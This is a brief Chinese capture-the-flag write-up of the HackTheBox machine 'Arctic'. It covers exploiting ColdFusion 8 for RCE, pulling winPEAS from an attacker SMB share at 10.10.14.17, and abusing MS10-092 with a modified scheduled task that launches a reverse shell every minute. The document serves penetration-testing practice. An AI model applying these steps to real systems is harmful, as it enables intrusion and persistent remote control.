Arctic - HackTheBox

nmap扫描

这8500端口扫出了个啥玩意，尝试一下浏览器访问

虽然是个http，但访问起来真的好慢啊

这个页面发现一个administrator，感觉是个管理页面

虽然不知道密码，但知道了cms名称为ColdFusion，版本为8，搜一下有无exp

刚好这有个rce

修改一下exp

提权，由于反弹回来的shell是cmd，并不是powershell，所以无法远程下载提权检测脚本

利用impacket-smbserver -smb2support root ''开启一个文件共享

copy \\10.10.14.17\root\winPEAS.bat，传输到靶机

靶机为windows 2008 R2

没有打任何补丁

一大堆提权方法，随便挑了一个MS10-092

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-092

这个提权工具是利用vb脚本，利用at写入一个计时任务，添加一个管理员用户

下载下来尝试利用

cscript test.wsf，执行

貌似并没有执行

这个脚本的计时任务居然是每月一次，这有什么用，修改一下

索性直接修改为定时执行反弹shell吧，msf生成一个反弹shell

将反弹shell下载到靶机

修改为每分钟执行一次反弹shell

执行之后立马就弹回来了